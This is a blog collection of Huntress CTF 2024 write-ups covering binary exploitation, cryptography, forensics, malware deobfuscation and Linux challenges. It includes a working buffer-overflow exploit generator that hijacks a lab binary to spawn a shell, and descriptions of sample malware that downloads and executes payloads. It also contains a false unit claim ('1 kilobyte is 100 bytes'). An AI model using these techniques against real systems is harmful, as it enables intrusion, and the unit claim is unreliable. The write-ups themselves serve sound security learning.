Huntress CTF 2024 on Monish Kumar's Blog

Binary Exploitation - Baby Buffer Overflow 32-bit

Sat, 26 Apr 2025 17:51:33 +0530

Baby Buffer Overflow - 32bit

Challenge Statement

Author: @aenygma

Can you command this program to where it cannot go?

To get the flag, you must somehow take control of its excecution.

Is it even possible?

Attachments: babybufov, babybufov.c

Note: This challenge was accompanied with a per-user instance

Solution

Opening the C source file given in the attachment section, we can see that it is a fairly straight forward program. There is the main function which requests some data using gets. If you have spent some time with C programming you would’ve known that this is a vulnerable function. The problem with this function is that it takes input with no limit on it’s length. Consequently, it writes data to addresses beyond the space reserved or allocated for the string causing a, that’s right, a buffer overflow.

Now due to some issues with the linker I couldn’t execute the binary provided directly. Luckily the source code had a comment to indicate how the program is compiled. So I used:

gcc -fno-pie -no-pie -Wno-implicit-function-declaration -fno-stack-protector -m32 babybufov.c -o babybufov

Notice that the compilation parameters turn off the stack protection, which makes write to stack possible. So obviously we are supposed to redirect execution flow to the uncalled target function in the code.

Here is a awesome video from liveoverflow that depicts this in a more illustratively. I suggest you watch the entire playlist if you are new to this sort of things.

So in a gist, function calls push return address on the stack so that when the function ends it can return the control to where it came from. The same stack also houses local variables such as the one that collects the string from the gets function. Now the idea is that we put enough characters in the string so that it overflows to the return address value and overwrites it.

A little knowledge of the GNU Debugger (gdb) is advisable for doing the below steps.

First we need to know how many characters it takes to overflow to the return address. Usually this is the string (buffer) size, but it can be more due to other variables. So I put in a recognizable string like ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ as input to observe the return address.

Of course it seg-faulted because there is no valid address as 0x46454443. But if you notice this is not a random address. 46 is the letter F in hexadecimal. So the address translates to FEDC. The reason why it is in reverse is because of the endianess. So now we now the address can be overwritten from the second C in the input.

Now we need to know the address of the function we need to redirect to. For this we can disassemble the target function to get the address of the first instruction in the address.

So the address to redirect the control is 0x080491a6. We can’t manually type in the return address is because it will be taken as string and stored differently in the stack. So I put together an python script exploitgen.py that generates an exploit input that can overwrite the return address.

import struct

buf = b"abcdefghijklmnopqrstuvwxyzab"
addr = struct.pack("I", 0x080491a6)
exp = buf + addr

with open("exploit", "wb") as f:
    f.write(exp)
    f.write("\n".encode())

The above code has the buffer required to fill the input buffer and adds the address at the end of it to overwrite the return address. The struct module offers packing and unpacking data between python and C data types with specific sizes. Since an address is 4 bytes long, I have used unsigned int (the I) as the target type. The newline is to mimic the press of enter button to finish input.

Once the exploit is generated, we can redirect it to the program directly like:

./babybufov_custom < exploit

Yup, we got the jackpot message in the target function. So we are successful in redirecting the execution. One might ask, is that it? Visiting again the source code for target we can see there is a shell that gets invoked. Since we give no more input it simply exits. So I added a little more to the exploitgen.py.

import struct

buf = b"abcdefghijklmnopqrstuvwxyzab"
addr = struct.pack("I", 0x080491a6)
exp = buf + addr

with open("exploit", "wb") as f:
    f.write(exp)
    f.write("\n".encode())
    f.write("ls\n".encode())

Now it lists the files in the directory it is on as shown below:

And now we have code execution as well. Now it’s time to test this on the real thing. The challenge came with a per-user instance. Spinning it up gave a netcat command to the program directly. So I redirected my exploit to the netcat program:

It didn’t work. I tried a couple more times to meet with the same result. But it worked on my machine. For those who already figured out what went wrong, well done. It took me quite a while, longer than I would like to admit. You see the problem is that I recompiled the code in my system, which made the addresses different. So I was redirecting the code to a wrong address.

Since we have the original binary, it will should the same addresses as the one over netcat. So I used objdump to get the address of the target function.

Armed with the actual address I need, I put that in my exploit program, generated an exploit and redirected it the netcat program.

So it appears there is a file flag in the same directory as the program. So I added a cat flag to my exploit and repeated the same.

So there it was, the flag. This is quite simple if you know your basics well (and don’t do silly mistakes like me).

Cryptography - No need for brutus

Sat, 26 Apr 2025 17:51:33 +0530

No need for Brutus

Challenge Statement

Author:@aenygma

A simple message for you to decipher:

squiqhyiiycfbudeduutvehrhkjki

Submit the original plaintext hashed with MD5, wrapped between the usual flag format: flag{}

Solution

The title includes Brutus who is known for betraying Julius Caesar. Caesar happen to be named after a cipher he created, The Caesar cipher, also known as ROT cipher.

This suggests that the cipher provided might be a ROT cipher for which we don’t know the key for.

Using Cyberchef we can use the recipe ROT13 Brute Force to list all possible plaintext for the cipher.

We find a plain text with key value of 10. Since the challenge requires us to use the MD5Sum of this plaintext we can calculate it using:

echo -n "caesarissimplenoneedforbrutus" | md5sum

Covering the obtained hash with flag format yields the flag

Cryptography - Strive Marish Leadman TypeCDR

Sat, 26 Apr 2025 17:51:33 +0530

Strive Marish Leadman TypeCDR

Challenge Statement

Author:@aenygma

Looks like primo hex garbage.

Maybe something went wrong?

Can you make sense of it?

Note: This challenge was accompanied with a per-user instance

Solution

On spinning up the per-user instance, I was given a command to use Netcat into the instance.

On connecting it just print out the following data and exitted.

Now if you have worked with cryptosystems you could have recognized what this is right away. But those who don’t, this is variable for a RSA public cryptosystem.

The given are everything that needed to encrypt and decrypt data.

A quick run down of that is:

p and q are supposed to be very large prime numbers
n = p * q
Now a value called Euler’s phi function for the value n is calculated as phi(n) = (p-1)*(q-1)
Now a random value e is selected such that e < phi(n) and e and phi(n) are co-prime
This e is the public key
Now the corresponding private key is derived such that d*e = 1 mod phi(n)
With this one can encrypt message m to cipher c with public key as c = (m^e) mod n
This can be reversed or decrypted using private key as m = (c^d) mod n

Since we have all the variables and assuming the data in the bottom is ciphertext, this boils down to a simple decrytion.

I used a tool called rsactftool to get it done.

By just plugging in the values of p, q, d, e and data to decrypt, the tool even decoded the output to UTF-8 making my job easier.

Forensics - Hidden Streams

Sat, 26 Apr 2025 17:51:33 +0530

Hidden Streams

Challenge Statement

Author: Adam Rice (@adam.huntress)

Beneath the surface, secrets glide,

A gentle flow where whispers hide.

Unseen currents, silent dreams,

Carrying tales in hidden streams.

Can you find the secrets in these Sysmon logs?

Attachment: Challenge.zip

Solution

The zip contains a EVTX Sysmon log file. You may use the windows event viewer to open this or you could use something like evtx_dump to dump it as XML.

Some time ago I have watched this video from John Hammond’s Channel where he explains about hiding data about alternate data streams. Since, he is working in Huntress, it gives me enough reason that this might exactly be the case. But we only have an event log.

A quick internet search on how to find alternate data streams yielded results, but nothing came up in context of event logs. So I had to broaden my search and checked if any event is logged when a data stream is created, written or modified. Soon I found out event ID 15, FileStreamCreateHash, logs creation of streams with hashes and contents in it. Since alternate data streams are also streams this seemed good.

I used to evtx_dump and grep to filter for event ID 15 and I got a hit. After some tinkering with the how much data I wanted grep to display, I got the event down.

Under the content section we can notice some base64 encoded data. Decoding it, got the flag.

Forensics - Keyboard Junkie

Sat, 26 Apr 2025 17:51:33 +0530

Keyboard Junkie

Challenge Statement

Author: @JohnHammond

My friend wouldn’t shut up about his new keyboard, so…

Attachment: keyboard_junkie

Solution

Running file command on the attachment reveals it to be a PCAP file. Opening it with a wireshark, a packet analyzer, we can observe USB capture data.

On top of the capture we can even see the request and response of USB device descriptor. This is what happens when you connect a USB input device to a host. The host requests the descriptor for what type of device it is and the device responds. Based on the response we can conclude that, the device is a Keyboard.

We can also observe a lot of URB (USB Request Block) interrupts in the capture. These are keystrokes recorded by the keyboard. We can’t directly see what was typed in as it is not that simple with keyboard. Keystrokes maybe a simple keypress, or a combination of control keys and others. So they have a representation format of their own. This has been explained to good detail in this blog.

To extract the keystroke data, I used tshark to extract the captured data. This is how the data actually looks like:

Now we need to decode this data. We can do it ourselves but I thought someone might have already put together a script for this. A quick internet search later, I found a page on hacktricks.xyz about usb pcap inspection and and how we can decode it using ctf-usb-keyboard-parser.

I then just cloned the repo, put the commands for extraction and execution in solve.sh. Executing them yielded the flag.

Forensics - Obfuscation Station

Sat, 26 Apr 2025 17:51:33 +0530

Obfuscation Station

Challenge Statement

Author: @resume

You’ve reached the Obfuscation Station!

Can you decode this PowerShell to find the flag?

Archive password: infected-station

Attachment: challenge.zip

Solution

Extracting the archive, we have a powershell script with the following contents:

The script seems to decode a base64 data, decompresses it to a stream and converts it to a string and then extracts some characters from an environment variable and joins them. I thought ‘iex’ and I was right.

So I tried to put the string into a variable and output it. But the script kept throwing errors at me. So I wrote another script mimicking the same logic, but cleaner. Putting them at solve.ps1, and executing it, gave the flag.

Forensics - Zimmer Down

Sat, 26 Apr 2025 17:51:33 +0530

Zimmer Down

Challenge Statement

Author: @sudo_Rem

A user interacted with a suspicious file on one of our hosts.

The only thing we managed to grab was the user’s registry hive.

Are they hiding any secrets?

Attachment: NTUSER.DAT

Solution

The attachment is the NTUSER.DAT file of some windows host. NTUSER.DAT is a special file that is located in the userprofile of each user. This file stores the registry keys of a particular user, also called as registry hives.

One may open it by loading the hive onto the windows registry editor or use tools to explore the keys directly. I used a tool called reglookup.

The challenge description says that the user interacted with a “suspicious” file. So, if a user interacted with it, then it must be noted under RecentDocs folder in the hive. Using reglookup I could list the keys under the RecentDocs folder using the command:

reglookup -p /Software/Microsoft/Windows/CurrentVersion/Explorer/RecentDocs NTUSER.DAT

There were several entries in there but not a lot. Going through those, the below entry caught my eye.

Why? It is unusually long. And it had a file extension type I didn’t recognize, .b62. Of course most of the data is URL encoded, so put it in cyberchef to decode it.

URL decoding didn’t change much, but allowed me to see that it was not a .b62 file but rather a .lnk file. But we don’t have access to the file, so we can’t analyze the file. Then it hit me, the name of the file was unusually long, and don’t seem random. Looks like a encoding, then it again hit me, .b62 refers to base62 encoding.

So I found a base62 decoder on the internet and put in the file name. Decoding it gave the flag.

Huntress CTF 2024 Writeups

Sat, 26 Apr 2025 17:51:33 +0530

This list of posts contain all my writeups from the Huntress CTF 2024 held in October in observance of the Cybersecurity awareness month by team Huntress. I participated under the alias “NightComet”

The writeups where originally posted in my github repo.

Malware - Discount Programming Devices

Sat, 26 Apr 2025 17:51:33 +0530

Discount Programming Devices

Challenge Statement

Author: @sudo_Rem

I used a tool on the internet to obfuscate my script!

But I lost it, and I don’t know how to get it back.

Maybe you can help?

Attachment: oops.py

Solution

In this challenge, we have a python script that has a lambda function declaration assigned to an underscore _. It takes an argument __ and has the contents as:

_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))

What’s going on here is simple. The argument __ is reversed, and passed to base64 decoder and then in turn passed to the decompress function from the zlib module.

Following this declaration, is an exec function call that references the function pointer and passes on a very lengthy argument. Since the size of the argument was long, I figured it might take several passes to get to the end, so I put a script together process.py.

With the script, we can see that it took 50 passes and finally we have another python code at the end of it. It seems to be of the same logic, but putting the contents in final.py and executing it gave me the flag.

Now it really seems straightforward. But did I actually do anything? I just did what the script would’ve done but in separate steps. So just to check, now that I know what the script is, I ran the oops.py directly. It gave the flag just like that.

So I was wondering what was the point, but didn’t really think much of it. Then going through the CTF discord server, the challenge author admitted it was indeed a mistake.

Malware - Eco Friendly

Sat, 26 Apr 2025 17:51:33 +0530

Eco-Friendly

Challenge Statement

Author: @JohnHammond

This sample is good for the environment!

Attachment: eco_friendly

Solution

For this challenge, we are given a powershell script, or I should say, one very long line of powershell. Opening the given file we can see an iex (Invoke-Expression) cmdlet that will execute whatever command follows it.

But the argument for the cmdlet seems to a string with random numbers in curly braces. If we scroll down for some time, we can find the end of the string with a option -f which is used to format strings in powershell.

What follows the -f is lots of environment variables with an index number. Which means the script uses, fixed environment variables that is uniform across all Windows machine to construct the payload from the individual characters indexed from said environment variables. The random numbers in curly braces are just positional parameters. This type of technique is used to evade detection from anti-malware solutions which may scan for suspicious keywords.

Now that we know this, we can just replace the iex at the starting with a Write-Host cmdlet to write whatever the string will be constructed to rather than executing it.

Doing that, saving it to payload.ps1 and executing the script, reveals another level of obfuscation with the same technique. So putting that in file stage1 and modifying the iex to Write-Host in stage1_modified.ps1 and executing again leads to another level of same obfuscation. Repeating the same with stage2 and stage2_modified.ps1 leads to another level of obfuscation. Doing it again with stage3 and stage3_modified.ps1 finally gave away the flag as a comment.

I should have anticipated nested levels of obfuscation and written a script to get the process done, but still unsure of what it might hold, I did it manually. But got the flag at the end.

Malware - Palimpsest

Sat, 26 Apr 2025 17:51:33 +0530

Palimpsest

Challenge Statement

Author: Adam Rice (@adam.huntress)

Our IT department was setting up a new workstation and started encountering some strange errors while installing software.

The technician noticed a strange scheduled task and luckily backed it up and grabbed some log files before wiping the machine!

Can you figure out what’s going on?

We’ve included the exported scheduled task and log files below.

The archive password is infected-palimpsest.

Attachment: Challenge.zip

Solution

The attachment archive contains 3 event viewer logs (Application, Security and System) and a Updater Service.xml. I first opened the XML file, which is the scheduled task that the challenge description tells about.

While most of the contents of the XML file is pretty much what you’d find in most scheduled tasks, I was more interested in the actions of the task. As we can see, it is a powershell line, that collects the DNS TXT records from the site 5aa456e4dbed10b.pyrchdata.com, base64 decodes it, builds a string from it and executes it. So I queries the DNS TXT records myself to find out base64 data in it.

Putting the contents in txt_records and decoding it, yields a powershell script with some obfuscation.

The first brackets reference the shell ID which I’m quite sure is constructing iex cmdlet. Putting that in stage1_payload.ps1 and modifying the iex with Write-Host should give us the next part of the payload.

Doing that does indeed reveals the next part of the payload. Now we still have an obfuscated script. The first line now tries to get a variable that matches the pattern *mdr* and constructs something. I was pretty sure that is also iex as well, but to be sure, I checked. Repeating the same trick we move on to the next stage of payload.

Now this payload doesn’t have any base encoded strings, on the contrary stage3_payload.ps1 does something else. But I couldn’t fully read it because of the garbled format strings. I decided to clean it and substitute those strings to their result, I had stage3_cleaned.ps1 which was more readable.

We can now see clearly, that the payload gets the application event log with source as mslnstaller (notice the typosquatting) and filters events with InstanceID within 40000 - 65000, extracts “data” from those logs and writes it to the a file named flag.mp4 in the AppData folder.

Now we have use for those event log files, opening Application.evtx in windows event viewer and filtering events between 40000 - 65000 with source as mslnstaller we have exactly 100 such logs.

Every record out of those 100 logs had a data node with some text and binary data. It is fair to assume that the binary data is what is being written to flag.mp4 all we have to do is extract it.

Now I can write powershell scirpts to some level, I didn’t know how to extract fields from saved log files in it at the time of solving this challenge. So converted the .evtx files to .csv using this tool.

Once I converted it, it was fairly easy for me to put a python script extract_data.py together to extract the binary data and write to a file. The logic behind the script is simple. It opens the csv file and parses it using the csv module and then checks each row for the condition required as in the powershell script. Then I used unhexlify from binascii module to convert the hex to actual binary data and wrote it to a file from_evtx_data.

Even though the powershell script tells us it is an mp4, I was still a little suspicious it might be something else. But when I ran file utility on it, it revealed that it is indeed a MP4 video file. Opening it got me:

So it says “It’s free real estate” and yeah the flag is there too. I tried using OCR to get the flag from the video, but it had a few mistakes which I had to correct it manually.

Malware - Ping Me

Sat, 26 Apr 2025 17:51:33 +0530

Ping Me

Challenge Statement

Author: @JohnHammond

We found this file in the autoruns of a host that seemed to have a lot of network activity… can you figure out what it was doing?

Attachment: ping_me.vbs

Solution

For this challenge we are given a VBScript.

Now I am not familiar with VBScript, but looking at the script we can observe an “Execute” at the start and a long expression. So it is logical to conclude that the expression evaluates to something and the “Execute” will execute whatever the expression evaluates to.

In order to know what it really does, we just need to replace “Execute” with some print statement from VBScript. So I opened onlinegdb and it already had boilerplate code to output something (Hello world). I just modified it to evaluate the expression and output it.

Now we can see, that it indeed gets another script which should be VBScript as well. After adding some spaces and newline to it we have:

This script seems to have a list of IP address and runs a ping command on all of them. Well that explains the part of challenge description that says “a lot of network activity”, but what now?

The IP address may seem random to an untrained eye. But I recognized them not to be random. You see the each octect in the IP address is a valid ASCII character and most of them are in alphabet and number character ranges.

So I copied the list of IP address, put them in a solve.py to process them and convert them to a valid string. The script just splits the octets put them in a list and uses chr function to convert the octets to valid characters.

ips = ["102.108.97.103", "123.54.100.49", "98.54.48.52", "98.98.49.98", "54.100.97.51", "50.98.56.98", "98.99.97.57", "101.50.54.100", "53.49.53.56", "57.125.35.35"]
chars = []
for ip in ips:
    chars.extend(ip.split("."))

flag = "".join([chr(int(i)) for i in chars])

print(flag.strip("#"))

This script gave away the flag.

Malware - Revenge of the Discount Programming Devices

Sat, 26 Apr 2025 17:51:33 +0530

Revenge of Discount Programming Devices

Challenge Statement

Author: @sudo_Rem

One of our security analysts learned to avoid printing out flag when obfuscating code!

Unfortunately, now they’ve lost that flag.

Maybe you can help them get it back.

Attachment: challenge

Solution

In this challenge we are given a binary, an ELF binary to be specific. Running strings utility on the binary among the entries we can find strong indicators (as shown below) that the binary has been compiled using pyinstaller. This is a tool to convert python source code files to executable binaries.

There is this tool called pyinstxtractor that can extract the contents of a binary that is compiled by pyinstaller. Using that tool I was able to dump all the contents of the binary into a folder. Since it is a statically linked binary there were quite a few things that got extracted. But we are focused on the challenge.pyc. This file contains the bytecode of the original file that was used to compile.

We still need to convert the bytecode to actual source code before we can work on what it does. For that we can make use of another tool called pycdc. Using the tool, I converted bytecode file challenge.pyc to decompiled.py.

Now we have something to work on. On top of the code we can observe a lambda function that is assigned to a function pointer variable _ (underscore). It takes an argument which is __ (two underscores). The function reverses the data it gets, does a base64 decoding and uses the zlib module to decompress the decoded contents. Then there is a exec function that uses the function pointer _ and passes a very long string of data to it.

Since the string was very long, I suspected multiple levels of same obfuscation. So I wrote a python script solve_stage1.py to run the data till there is a exec function in the code.

As we see, after 50 passes, we get a long list of numbers. But this list is commented out. At the end of the list there are 2 print statements out of which is one commented out. The first print statement simply joins the result of chr function of each number in the list. The other prints out a string. I put this contents to stage2.py and reversed the comments.

Since this provides us with another python script, I put that in stage3.py, and cleaned the names of the variables. The variables were named with different number of underscores whose real names were declared at the start.

After cleaning them, the functionality was revealed to be just an XOR operation between the two long byte sequence and print the output.

Now we are once again facing the same function as the first round of payload. So I made a copy of solve_stage1.py as solve_stage4.py and swapped the argument payload.

And executing solve_stage4.py gave away the flag.

Malware - Russian Roulette

Sat, 26 Apr 2025 17:51:33 +0530

Russian Roulette

Challenge Statement

Author: @JohnHammond

My PowerShell has been acting really weird!! It takes a few seconds to start up, and sometimes it just crashes my computer!?!?! :(

WARNING: Please examine this challenge inside of a virtual machine for your own security. Upon invocation there is a real possibility that your VM may crash.

NOTE: Archive password is russian_roulette

Attachment: russian_roulette.zip

Solution

Extracting the archive outputs only a lnk file. LNK files are basically shortcuts in windows. There are special files that open other files or execute commands. LNK files are a common threat vector as phishers can disguise anything as LNK file.

For this challenge we have a Windows PowerShell.lnk. To see what it really opens we need a parser that can parse the LNK file contents. I found this tool called LnkParse3 that could do what I want.

So the target of the shortcut is not a file but a powershell command. The -e option allows encoded scripts or strings to execute. This is basically more powershell command but encoded in base64.

On decoding the argument, we can observe that it uses the iwr (Invoke-WebRequest) cmdlet to download the contents pointed by the link and save it to a file .cmd in the temp folder. Finally this .cmd file is executed.

Collecting the contents of the link downloaded a powershell.zip but it was in fact a batch script. So I renamed it to raw_payload.bat.

For some reason I don’t know, this batch file when opened with text editors showed garbled text, but when I used cat utility from the terminal it displayed the batch script. My theory was that it is because of the first two characters of the file where not recognizable. When I removed it and put the rest of the script in payload.bat.

There were a lot of Russian comments (or I should say quotes) in the file. So I put together cleanse.py to remove those commands and write the contents to payload cleaned.bat. Now I had more visibility over the code.

I have seen this type of obfuscation before. So at the start of the script we can see a variable ucbw to getting set as set. Following it are lines that start with using the variable ucbw. If we replace ucbw as set everywhere in the script, it is one step deobfuscating the script.

The variable qmy is not empty actually. It has a white space. So replace %qmy% with a single whitespace in the script and replacing %jxaa% with =, we get:

Now we can keep on replacing variables with characters till we hit this:

The expression set /a rtoy=9161456 %% 9161359 mean set the variable rtoy with the resultant value of arithmetic expression 9161456 %% 9161359. %% is the modulus operation. So rtoy will be assigned 97, in this case. Next up we have cmd /c exit=%rtoy%. cmd \c executes the command passed to it. And that command here is exit with the exit code specified by variable rtoy. Next up set ztq=%=exitcodeAscii%. %=exitcodeAscii% is an undocumented dynamic variable in windows, that for some reason returns the exit code of the last program as an ascii character.

Putting them together, the second line executes a cmd exit command with a exit code and the next command gets that exit code as ascii. In ascii 97 maps to the character ‘a’. Now the variable %ztq% can be used whenever you need a character ‘a’. So essentially for the next many commands are just construction of alphabets, numericals and symbols.

De-obfuscating all that yielded payload deobfuscated.bat. In that you will find another encoded powershell payload.

I copied that payload and put it in powershell base64.txt to decode the contents.

I put the contents obtained in powershell payload.ps1 and modified it to make it easy on the eyes.

Looking at the powershell script, we can see another sort of code in the variable $s. Since I spent some time with C#, I recognized it right away. So the code creates an compiler object, compiles the function Shot in the class X , then with a 1 out of 6 chance executes the function Shot.

The function Shot contains some areas of interest. It imports two functions from the ntdll.dll. And does AES decrytion on some data. But after some time of research on the internet, I found out that NtRaiseHardError is an undocumented API from windows, that can be used to force BSOD (Blue Screen of Death) errors. Effectively this will restart you operating system. So even if function Shot is executed it crashes the OS before it reaches the decryption code.

So I put solve.cs removing the DLL imports and put a writeline to output the decrypted content.

And that indeed was the flag. Also if you don’t want to dabble with C#, then you can just copy the decryption data on cyberchef and obtain the flag that way as well.

Malware - Strange Calc

Sat, 26 Apr 2025 17:51:33 +0530

Strange Calc

Challenge Statement

Author: @JohnHammond

I got this new calculator app from my friend! But it’s really weird, for some reason it needs admin permissions to run??

NOTE: Archive password is strange_calc

Attachment: calc.zip

Solution

Extracting the archive, we have a calc.exe that appears to be a PE executable. Running file command on the executable proves that it is indeed a PE executable but also reveals that it is a UPX packed executable.

UPX is a “packer” program that compresses executables making them effectively smaller. But since compression increases the entropy of the executable, or in other words garbles the contents in the executable, packers are used to sneak malwares and evade a number of security tools.

We can use the upx command line tool to unpack a executable using the command upx -d <executable>

I unpacked the binary to calc_unpacked.exe, but this will turn out to be not necessary at all.

I ran the strings utility on the executable trying to find some clues to deduce what kind of functionality the program has. While the unpacked version provided with function names used in the program they weren’t enough to make things clear. But then I saw a XML amidst the outputs.

It seemed to be a manifest of some kind, and has the name “AutoIT” in it. I actually had no idea what it was. I never even heard of it at that point. A quick internet search provided the needed details. AutoIT is a scripting language that can be used to automate windows UI and things.

So that led to another question “What is a script doing in a executable?”. That was also quickly answered with a few more searches and I even found a tool called AutoIt-Ripper that can extract AutoIT scripts from executables.

I didn’t understand what most of the code does, but the base64 string did catch my eye right away. So I decided to decode what it does.

I didn’t know what this was either. But the #@~^ at the start and ^#~@ at the end strongly suggested this is not random data. I found the start in Wikipedia’s list of file signatures and it seems it is encoded VBScript. If it’s encoded there must be ways to decode it.

After searching for a little I found several decoders for the job. Like this one, a vbe-decoder repo from the challenge author himself and even cyberchef had a recipe for it. I decided to go with cyberchef for the job.

Decoding the script, I noticed that it is not VBScript, but JavaScript. I put on a JS beautifier to read the code better. I put the code in decoded.js. The function does some decoding stuff, but I was more interested in the part below the function.

I did know what was in variable m though. This is called uuencoding. This is another binary to text encoding like base64 but was first devised to transfer data between unix machines. Hence the name u-u-encoding. So the script has function a to decode the data, create a new user LocalAdministrator, use the decoded data as password, add the user to administrator group and then run calc.exe (again I guess).

So it seems straightforward right? Decode the uuencoding and we should probably have the flag right? Well, yes but no. The encoded data in the javascript is not standard encoding. So only function a can decode it. So I put the function in my browser’s javascript runtime and used console.log to print the output.

No output? How? I know this was crazy thinking but I thought “Perhaps it will only work on a windows runtime”. The return value will be the password of the user LocalAdministrator. So if I execute calc.exe in a virtual machine and then extract password from the account, I could have the return value.

Guess what? The account was indeed created after I executed it, but it had no password. So I thought I went down the wrong rabbit hole and started performing dynamic analysis with flare-fakenet, ProcMon, x64dbg and quite others. But nothing seemed to make much sense.

After sometime I decided to take good look at the function code. And then it caught my eye.

The function returns only a substring of the decoded string. So what was in the entire string? I then added console.log(c) before the return statement and ran the code again in my browser’s runtime.

So yeah there was the flag. I was literally looking at it the whole time but it still managed to evade.

Miscellaneous - Base-p-

Sat, 26 Apr 2025 17:51:33 +0530

Base-p-

Challenge Statement

Author: Izzy Spering

That looks like a weird encoding, I wonder what it’s based on.

Attachment: based.txt

Solution

The attachment is a text file. Opening it, the contents were in a language I didn’t know.

I tried to translate the contents using google translate which detected it to be Cantonese. The title suggest some sort of base encoding so does the challenge description.

I was looking for encodings specifically base encodings that outputs such characters. Incidentally, I stumbled upon several writeups from Huntress 2023 challenge baseffff+1 such as this one . And it seems the challenge text followed a encoding base65536. It seemed similar to the one I have now.

I found a online decoder that decodes base65536. So I tried it.

It seems that now we just have a plain base64 encoded data. I put the contents in a file unbased.txt. So decoding base64 data, we have some more data.

At first I couldn’t make sense of what this is. But the ‘mg’ at the start of the file made me think it must be a file signature. So I ran the output through file utility.

So this is a gunzip archive. I put the output contents in a gunzip archive compressed.gz and extracted it using the gzip utility. Extracting the contents gave a single file. Running file utility reveals it to be a PNG image.

Since it is a PNG file, I opened it to view it’s contents. It seems to be a strip of colors. What it was? I had no idea.

I examined EXIF data, ran the strings utility, viewed the hex code of the image. After hours of scratching my head and searching for encodings in images and many more, nothing came up. Then I showed it to my friend, who jokingly told me what if the data is the hex codes of color of the images. But guess what, it made sense. There are 13 colors. 3 bytes for one color. 39 bytes of data. 39 characters. The flag usually contains 38 characters.

So I used a color picker to read the hex color code of each color and put them in the file color_codes.

Now this makes a lot of sense if you know your hex codes. So we just need to convert this to string. That can be achieved by:

cat color_codes | tr -d ' ' | xxd -p -r

There it was. Sometimes we just need a fresh perspective to look at things.

Miscellaneous - Linux Basics

Sat, 26 Apr 2025 17:51:33 +0530

Linux Basics

Challenge Statement

Author: @aenygma

You’re expected to answer a series of questions to get the flag.

To view the questions, and answer them, you’ll use the answer tool.

Display questions: answer

Answer a question: answer x where x is question number.

Note: This challenge was accompanied with a per-user instance

Solution

Spinning up the per-user instance for the challenge I was able to connect using netcat to a “shell”. Except it wasn’t a shell but a relay of data using socat. Anyway once I got in I was greeted with a message and as per the challenge description I ran answer to see the questions.

The entire challenge is easy if you know your way around a bash shell.

Question 0: What's your home directory?

Using pwd command I checked which directory I am currently at. I was in the home directory of a user named user. So the answer is /home/user

Question 1: Search the man pages. What command would you use to generate random permutations?

I didn’t refer the man pages, but a quick search on internet gave me the utility shuf. It’s one of the core utilities of linux systems apparently. So that was the answer.

Question 2: On what day was /home/user/myfile.txt modified? Use the date format 2019-12-31 Question 3: How big is /home/user/myfile.txt, in kilobytes? Round to the nearest whole number. Question 4: What user owns the file /home/user/myfile.txt Question 5: What's the 3-digit octal permissions of the file /home/user/myfile.txt? (e.g 777)

Now all these questions are centered around myfile.txt in the home directory. So all it takes is the output of ls -l command.

For question 2, the date modified is Aug 29 1997 as seen from the output. Putting it in format required it is 1997-08-29.

For question 3, the size of the file myfile.txt is required. It is the 22200 number that is the size. But this is in bytes. 1 kilobyte is 100 bytes. So 22200 bytes is roughly 22.2 kilobytes. Since they asked to round to the nearest whole number, 22 is the answer.

For question 4, the user that owns is the 3rd column in the output. The next to that is the group that owns the file. But since we just need the user who owns it, it is root user. So answer is root.

For question 5, we need the 3-digit octal permission of the file. We don’t directly have the answer, but we can calculate it from the permissions column which is the first column. The first column is filled with 10 characters. Ignore the first character as it tells us what type of entry it is. The rest of it can be used to derive the octal permission. Each triplet in the 9 characters correspond to one digit in the octal. With r - 4, w - 2, x - 1 and -(dash) - 0. So the octal permission is (4+2+1)(4+1)(4) = 754. That’s the answer.

Question 6: What is the user id of 'admin'?

We can simply use the id command to view the ID related to admin account. So according to the output, it is 1338.

Question 7: There is a user 'john' on the system. Can they write to /home/user/myfile.txt? (yes/no) Question 8: Can the 'admin' user execute /home/user/myfile.txt? (yes/no)

Now again we go back to myfile.txt. So again we just need the output of ls -l for this job.

For question 7, as we can see the ‘w’ is set only for the user. So only the user who owns the file can write to it. So, no, john cannot write to it.

For question 8, the execution flag ‘x’ is set for both user and group who owns the file. And admin happens to be the group. So yes, admin can execute the file.

Question 9: Which user on the system, except for you, root, admin and john, can execute /home/user/myfile.txt?

For question 9, if we recall from question 8, only the user and group who owns the file can execute it. So the user who owns it is root. But what about the group. If anyone other than the given list of user can execute it, they must be a member of group admin. So examining /etc/group, we can notice a user rose in the group admin. So yeah, that user can execute the file.

Question 10: /home/user/myfile.txt looks like a txt file, but it actually isn't. What kind of file is it?

So it is not a text file? When in doubt, use the file utility. It reveals that it is a JPEG image. So the answer is jpeg.

Once I give that answer, the program gives me the flag. So that’s it? Well yes, but no.

My curiosity wanted me to know what that image is. So I exfiltrated it. For anyone wondering, the tool xxd was available. So I dumped the image. Copied the dump to somehexdump and did the reverse operation on my machine to somejpeg.jpeg. Opening the file I found:

Hmm. That seems like something. Something great. Or some great rabbit hole. Or a wild goose hunt. I don’t know. I spend some time snooping around the instance trying to look for things but then I moved on to the next challenge. So if I find anyone who found it (if it is real) I’ll update.

Miscellaneous - Malibu

Sat, 26 Apr 2025 17:51:33 +0530

Malibu

Challenge Statement

Author: Truman Kain

What do you bring to the beach?

NOTE: There are two things to note for this challenge.

This service takes a bit more time to start. If you see a Connection refused, please wait a bit more.
This service will not immediately respond or prompt you… it is waiting for your input. If you just hit Enter, you will see what it is.

Extra tip, once you know what the service is, try connecting in a better way. Then use some of the context clues and critical thinking based off its response and the challenge description. You don’t need any bruteforcing once you understand the infrastructure and enumerate. ;)

Note: This challenge was accompanied with a per-user instance

Solution

Spinning up the per-user instance for the challenge I was given a command line to connect to a instance using netcat. It printed nothing. No prompt. Just like they told in the challenge description. So it seems it is waiting for some input, not sure what. I typed in a hello, because I had to give it something.

HTTP? Bad Request? So is this a HTTP server? One way to find out. I crafted a valid HTTP request (fancy way of telling I typed it). Since I did not know what endpoints are available I just requested a /testing endpoint.

This confirms this is definitely a HTTP server. And based on the reply we can deduce a few things. First thing is it is running a MinIO server. I didn’t know what it really was, so I looked it up. The website tells that it is a S3 compatible storage service. Since I have spent some time using AWS, I knew what S3 is. S3 is a simple object storage service that is part of the AWS infrastructure. Users can store their files and data in it.

The reply header X-Amz-Id-2 and X-Amz-Request-Id further supports this point that we are communicating with some AWS infrastructure.

Lastly, the endpoint name I gave is taken as a name of a bucket. Bucket? Yes, S3 allows user to separate files they upload by creating various “buckets”. Each bucket acts as a separately independent storage. So it is logical to assume that we are to query a endpoint that points to a valid bucket name.

